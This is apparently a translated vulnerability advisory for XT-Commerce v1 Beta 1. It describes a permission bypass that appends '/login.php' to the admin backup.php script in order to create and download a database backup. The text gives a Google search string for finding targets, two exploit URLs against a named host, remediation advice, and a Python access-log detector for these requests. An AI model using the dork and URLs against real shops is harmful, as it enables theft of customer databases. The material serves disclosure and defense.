XT-Commerce v1 Beta 1 permission bypass, modify and download backup vulnerability - vulnerability warning - Black Bar Safety Net

ID MYHACK58:62201026827
Type myhack58
Reporter Anonymous (佚名)
Modified 2010-05-02T00:00:00


First published at: Red Section Network Security
Author: Amxking
Submitted by: indoushka
Vulnerable program: XT-Commerce v1 Beta 1
Affected version: v1 Beta 1
Risk level: medium
Vulnerability description:
Amxking: I obtained this vulnerability while in contact with the foreign Avengers team; it was published by indoushka, and I translated, supplemented and re-edited it for release. The vulnerability discloses database backup (BACKUP DATABASE) information. The translation is provided for AKT members to share. In principle it is very simple and nothing special; a brief introduction of the process follows.

The exploit:

1. Find a site running the program by searching Google for "Powered by XT-Commerce", or use a target on which the program is already installed.

  1. Create a backup: http://bbs.honkwin.com/XT-Commerce/admin/backup.php/login.php?action=backupnow

  2. Download the backup: http://bbs.honkwin.com/XT-Commerce/admin/backup.php/login.php?action=download&file=db_comm-20100301222138.sql

  Note: if the download does not work in IE, use Mozilla Firefox 10.10 instead.

  Both URLs call admin/backup.php with /login.php appended as extra path information after the script name; that appended segment is the permission bypass the title refers to, and it is the request shape to look for in access logs.

【Honkwin】Security recommendations:

  1. Add an authentication check to the back-end (admin) privilege handling.
  2. Set the database backup save path to a location under the web directory and strictly control access to it.
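As an added defender-side example (not part of this advisory or of XT-Commerce itself), the following Python flags the two request shapes shown above in web-server access logs: an admin script called with extra path information, and backup.php asked to create or hand out a dump. The log lines, client IPs and log format (Apache combined) are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" access-log line; only the fields the detector needs are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A .php script name followed by a further path segment (PATH_INFO), e.g. backup.php/login.php
PATH_INFO_RE = re.compile(r'\.php/\S+', re.IGNORECASE)

# Constructed sample log lines modelled on the URLs in the advisory (IPs and sizes are made up).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Mar/2010:22:21:38 +0800] "GET /XT-Commerce/admin/backup.php/login.php?action=backupnow HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Mar/2010:22:22:10 +0800] "GET /XT-Commerce/admin/backup.php/login.php?action=download&file=db_comm-20100301222138.sql HTTP/1.1" 200 1048576 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Mar/2010:22:25:01 +0800] "GET /XT-Commerce/admin/backup.php?action=backupnow HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [01/Mar/2010:22:30:00 +0800] "GET /XT-Commerce/product_info.php?products_id=12 HTTP/1.1" 200 8000 "-" "Mozilla/5.0"',
]

def classify(line):
    """Return (ip, status, findings) for one log line, or None if it is not parseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    path = url.path.lower()
    query = parse_qs(url.query)
    action = query.get("action", [""])[0].lower()
    findings = []
    # Admin script reached through extra path info: the shape of the bypass in the advisory.
    if "/admin/" in path and PATH_INFO_RE.search(path):
        findings.append("admin_script_with_path_info")
    # backup.php asked to create a dump or hand one out, with or without the bypass.
    if "/backup.php" in path:
        if action == "backupnow":
            findings.append("backup_triggered")
        elif action == "download" and query.get("file"):
            findings.append("backup_download:" + query["file"][0])
    return m.group("ip"), int(m.group("status")), findings

def scan(lines):
    """Return (ip, status, findings) for every line that produced findings; a 2xx status means the request succeeded."""
    return [hit for hit in map(classify, lines) if hit and hit[2]]

if __name__ == "__main__":
    for ip, status, findings in scan(SAMPLE_LOG):
        print(ip, status, ", ".join(findings))
```

A 302 on a plain backup.php request is the login redirect doing its job; the same action returning 200 through the path-info form is the case worth alerting on.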